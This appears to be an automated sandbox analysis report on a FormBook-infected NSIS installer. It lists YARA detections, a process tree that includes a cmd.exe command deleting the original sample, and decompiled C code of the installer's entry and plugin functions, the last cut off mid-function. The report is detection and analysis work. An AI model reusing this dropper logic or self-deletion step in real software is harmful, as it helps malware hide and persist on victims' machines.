                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6608

                                                                                                                        General

                                                                                                                        Start time:18:24:11
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: rundll32.exe PID: 6820 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:18:24:30
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: cmd.exe PID: 7032 Parent PID: 6820

                                                                                                                        General

                                                                                                                        Start time:18:24:33
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: conhost.exe PID: 7040 Parent PID: 7032

                                                                                                                        General

                                                                                                                        Start time:18:24:34
                                                                                                                        Start date:22/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >

                                                                                                                          Analysis Process: PQMW0W5h3X.exe PID: 6528 Parent PID: 6056 PQMW0W5h3X.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 004030FB, Relevance: 79.1, APIs: 26, Strings: 19, Instructions: 315stringfilecomCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				int _t91;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp",  &(_t56[2]));
								L25:
								_t116 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4;
											if( *0x423fd4 == 0) {
												L64:
												_t64 =  *0x423fec;
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f5c == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\engineer\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)( *0x423f50 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\engineer\\Desktop\\PQMW0W5h3X.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)( *0x423f50 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98(0x423740, "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\engineer\\Desktop\\PQMW0W5h3X.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\engineer\\Desktop\\PQMW0W5h3X.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}































                                                                                                                          0x0040310c
                                                                                                                          0x00403110
                                                                                                                          0x00403118
                                                                                                                          0x0040311c
                                                                                                                          0x00403121
                                                                                                                          0x00403131
                                                                                                                          0x00403134
                                                                                                                          0x0040313b
                                                                                                                          0x00403142
                                                                                                                          0x00403142
                                                                                                                          0x0040313b
                                                                                                                          0x00403144
                                                                                                                          0x00403144
                                                                                                                          0x0040325a
                                                                                                                          0x0040325a
                                                                                                                          0x0040325a
                                                                                                                          0x0040325c
                                                                                                                          0x0040325e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031f3
                                                                                                                          0x004031f6
                                                                                                                          0x004031fe
                                                                                                                          0x004031fe
                                                                                                                          0x00403201
                                                                                                                          0x00403206
                                                                                                                          0x00403208
                                                                                                                          0x00403208
                                                                                                                          0x00403209
                                                                                                                          0x00403209
                                                                                                                          0x0040320e
                                                                                                                          0x00403211
                                                                                                                          0x0040324a
                                                                                                                          0x0040324f
                                                                                                                          0x00403254
                                                                                                                          0x00403257
                                                                                                                          0x00403259
                                                                                                                          0x00403259
                                                                                                                          0x00403259
                                                                                                                          0x00000000
                                                                                                                          0x00403213
                                                                                                                          0x00403213
                                                                                                                          0x00403214
                                                                                                                          0x00403217
                                                                                                                          0x0040321f
                                                                                                                          0x00403222
                                                                                                                          0x00403224
                                                                                                                          0x00403224
                                                                                                                          0x00403224
                                                                                                                          0x00403224
                                                                                                                          0x00403222
                                                                                                                          0x00403229
                                                                                                                          0x0040322f
                                                                                                                          0x00403237
                                                                                                                          0x0040323a
                                                                                                                          0x0040323c
                                                                                                                          0x0040323c
                                                                                                                          0x0040323c
                                                                                                                          0x0040323c
                                                                                                                          0x0040323a
                                                                                                                          0x00403241
                                                                                                                          0x00403248
                                                                                                                          0x00403262
                                                                                                                          0x00403265
                                                                                                                          0x0040326e
                                                                                                                          0x00403273
                                                                                                                          0x00403273
                                                                                                                          0x0040327e
                                                                                                                          0x00403284
                                                                                                                          0x00403289
                                                                                                                          0x0040328b
                                                                                                                          0x004032b1
                                                                                                                          0x004032b6
                                                                                                                          0x004032c0
                                                                                                                          0x004032c7
                                                                                                                          0x004032cb
                                                                                                                          0x00403332
                                                                                                                          0x00403332
                                                                                                                          0x00403337
                                                                                                                          0x0040333d
                                                                                                                          0x00403341
                                                                                                                          0x00403456
                                                                                                                          0x0040345c
                                                                                                                          0x004034f9
                                                                                                                          0x004034f9
                                                                                                                          0x004034fe
                                                                                                                          0x00403501
                                                                                                                          0x00403503
                                                                                                                          0x00403503
                                                                                                                          0x0040350b
                                                                                                                          0x0040350b
                                                                                                                          0x0040346b
                                                                                                                          0x00403474
                                                                                                                          0x00403476
                                                                                                                          0x0040347b
                                                                                                                          0x0040347d
                                                                                                                          0x0040347f
                                                                                                                          0x00403481
                                                                                                                          0x00403483
                                                                                                                          0x00403485
                                                                                                                          0x00403487
                                                                                                                          0x00403497
                                                                                                                          0x00403499
                                                                                                                          0x0040349b
                                                                                                                          0x004034a8
                                                                                                                          0x004034b7
                                                                                                                          0x004034bf
                                                                                                                          0x004034c7
                                                                                                                          0x004034c7
                                                                                                                          0x0040349b
                                                                                                                          0x00403487
                                                                                                                          0x00403483
                                                                                                                          0x004034cb
                                                                                                                          0x004034d0
                                                                                                                          0x004034d7
                                                                                                                          0x004034e5
                                                                                                                          0x004034e8
                                                                                                                          0x004034ee
                                                                                                                          0x004034f0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004034d9
                                                                                                                          0x004034df
                                                                                                                          0x004034e1
                                                                                                                          0x004034e3
                                                                                                                          0x004034f2
                                                                                                                          0x004034f4
                                                                                                                          0x00000000
                                                                                                                          0x004034f4
                                                                                                                          0x00000000
                                                                                                                          0x004034e3
                                                                                                                          0x004034d7
                                                                                                                          0x00403350
                                                                                                                          0x00403357
                                                                                                                          0x00403357
                                                                                                                          0x004032d3
                                                                                                                          0x00403322
                                                                                                                          0x00403322
                                                                                                                          0x0040332e
                                                                                                                          0x00000000
                                                                                                                          0x0040332e
                                                                                                                          0x004032dc
                                                                                                                          0x004032e9
                                                                                                                          0x004032e0
                                                                                                                          0x004032e6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004032e8
                                                                                                                          0x004032e8
                                                                                                                          0x004032e8
                                                                                                                          0x004032ed
                                                                                                                          0x004032ef
                                                                                                                          0x004032f7
                                                                                                                          0x00403368
                                                                                                                          0x0040336a
                                                                                                                          0x00403371
                                                                                                                          0x00403379
                                                                                                                          0x00403379
                                                                                                                          0x00403384
                                                                                                                          0x00403389
                                                                                                                          0x00403398
                                                                                                                          0x0040339c
                                                                                                                          0x0040339d
                                                                                                                          0x004033a6
                                                                                                                          0x0040339f
                                                                                                                          0x0040339f
                                                                                                                          0x0040339f
                                                                                                                          0x004033ac
                                                                                                                          0x004033b2
                                                                                                                          0x004033b8
                                                                                                                          0x004033c0
                                                                                                                          0x004033c0
                                                                                                                          0x004033ce
                                                                                                                          0x004033d5
                                                                                                                          0x004033de
                                                                                                                          0x004033e4
                                                                                                                          0x004033f0
                                                                                                                          0x004033f6
                                                                                                                          0x00403400
                                                                                                                          0x0040340a
                                                                                                                          0x00403410
                                                                                                                          0x00403412
                                                                                                                          0x00403414
                                                                                                                          0x00403415
                                                                                                                          0x00403416
                                                                                                                          0x00403427
                                                                                                                          0x0040342d
                                                                                                                          0x00403434
                                                                                                                          0x00403437
                                                                                                                          0x0040343d
                                                                                                                          0x0040343d
                                                                                                                          0x00403434
                                                                                                                          0x00403412
                                                                                                                          0x00403441
                                                                                                                          0x00403447
                                                                                                                          0x00403447
                                                                                                                          0x00403447
                                                                                                                          0x0040344a
                                                                                                                          0x0040344b
                                                                                                                          0x0040344c
                                                                                                                          0x0040344c
                                                                                                                          0x00000000
                                                                                                                          0x00403398
                                                                                                                          0x004032f9
                                                                                                                          0x004032fb
                                                                                                                          0x00403306
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040330e
                                                                                                                          0x00403319
                                                                                                                          0x0040331e
                                                                                                                          0x00000000
                                                                                                                          0x0040331e
                                                                                                                          0x00403293
                                                                                                                          0x0040329f
                                                                                                                          0x004032a4
                                                                                                                          0x004032a9
                                                                                                                          0x004032ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403248
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031f8
                                                                                                                          0x004031f8
                                                                                                                          0x004031f8
                                                                                                                          0x004031f9
                                                                                                                          0x004031f9
                                                                                                                          0x00000000
                                                                                                                          0x004031f8
                                                                                                                          0x00000000
                                                                                                                          0x00403149
                                                                                                                          0x0040314a
                                                                                                                          0x00403156
                                                                                                                          0x0040315c
                                                                                                                          0x00000000
                                                                                                                          0x0040315e
                                                                                                                          0x00403160
                                                                                                                          0x00403167
                                                                                                                          0x0040316c
                                                                                                                          0x00403171
                                                                                                                          0x00403178
                                                                                                                          0x0040317e
                                                                                                                          0x00403194
                                                                                                                          0x004031a4
                                                                                                                          0x004031a9
                                                                                                                          0x004031af
                                                                                                                          0x004031b6
                                                                                                                          0x004031c9
                                                                                                                          0x004031ce
                                                                                                                          0x004031d0
                                                                                                                          0x004031d2
                                                                                                                          0x004031d7
                                                                                                                          0x004031d7
                                                                                                                          0x004031e7
                                                                                                                          0x004031ed
                                                                                                                          0x00000000
                                                                                                                          0x004031ed

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE ref: 00403121
                                                                                                                          • GetVersion.KERNEL32 ref: 00403127
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                                                                                          • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403178
                                                                                                                          • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                                                                                          • GetCommandLineA.KERNEL32(00423740,NSIS Error), ref: 004031A9
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000), ref: 004031BC
                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00409168), ref: 004031E7
                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                                                                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                          • OleUninitialize.OLE32(00000020), ref: 00403337
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403357
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000,00000020), ref: 0040336A
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000,00000020), ref: 00403379
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000,00000020), ref: 00403384
                                                                                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000,00000020), ref: 00403390
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                                                                                          • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                                                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\PQMW0W5h3X.exe,0041F0F0,00000001), ref: 0040340A
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                                                                                          • ExitProcess.KERNEL32 ref: 0040350B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                          • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\PQMW0W5h3X.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PQMW0W5h3X.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 3469842172-2139470994
                                                                                                                          • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                                                                          • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                                                                                          • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                                                                          • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001D3B, Relevance: 21.5, APIs: 14, Instructions: 499stringlibraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E10001D3B() {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				intOrPtr _v48;
				void* _v52;
				CHAR* _t180;
				void* _t182;
				signed int _t183;
				void* _t186;
				void* _t188;
				CHAR* _t190;
				void* _t198;
				struct HINSTANCE__* _t199;
				_Unknown_base(*)()* _t200;
				_Unknown_base(*)()* _t202;
				struct HINSTANCE__* _t203;
				void* _t205;
				char* _t206;
				_Unknown_base(*)()* _t207;
				void* _t218;
				signed char _t219;
				void* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				void* _t228;
				void* _t232;
				void* _t235;
				void* _t237;
				void* _t244;
				void* _t245;
				void* _t248;
				struct HINSTANCE__* _t253;
				CHAR* _t254;
				signed char _t257;
				void _t258;
				void* _t259;
				void* _t266;
				void* _t267;
				void* _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t279;
				signed char _t282;
				signed int _t283;
				CHAR* _t284;
				CHAR* _t286;
				struct HINSTANCE__* _t288;
				void* _t290;
				void* _t291;

				_t253 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v12 = 0;
				_v40 = 0;
				_t291 = 0;
				_t180 = E10001541();
				_v24 = _t180;
				_v28 = _t180;
				_v44 = E10001541();
				_t182 = E10001561();
				_v52 = _t182;
				_v8 = _t182;
				while(1) {
					_t183 = _v32;
					_t283 = 3;
					_v48 = _t183;
					if(_t183 != _t253 && _t291 == _t253) {
						break;
					}
					_t282 =  *_v8;
					_t257 = _t282;
					_t186 = _t257 - _t253;
					if(_t186 == 0) {
						_t29 =  &_v32;
						 *_t29 = _v32 | 0xffffffff;
						__eflags =  *_t29;
						L13:
						_t188 = _v48 - _t253;
						if(_t188 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t291 - _t253;
							if(_t291 == _t253) {
								_t224 = GlobalAlloc(0x40, 0x14a4); // executed
								_t291 = _t224;
								 *(_t291 + 0x810) = _t253;
								 *(_t291 + 0x814) = _t253;
							}
							_t258 = _v36;
							_t39 = _t291 + 8; // 0x8
							_t190 = _t39;
							_t40 = _t291 + 0x408; // 0x408
							_t284 = _t40;
							 *_t291 = _t258;
							 *_t190 =  *_t190 & 0x00000000;
							 *(_t291 + 0x808) = _t253;
							 *_t284 =  *_t284 & 0x00000000;
							_t259 = _t258 - _t253;
							__eflags = _t259;
							 *(_t291 + 0x80c) = _t253;
							 *(_t291 + 4) = _t253;
							if(_t259 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L56;
								}
								_t290 = 0;
								GlobalFree(_t291);
								_t291 = E10001641(_v24);
								__eflags = _t291 - _t253;
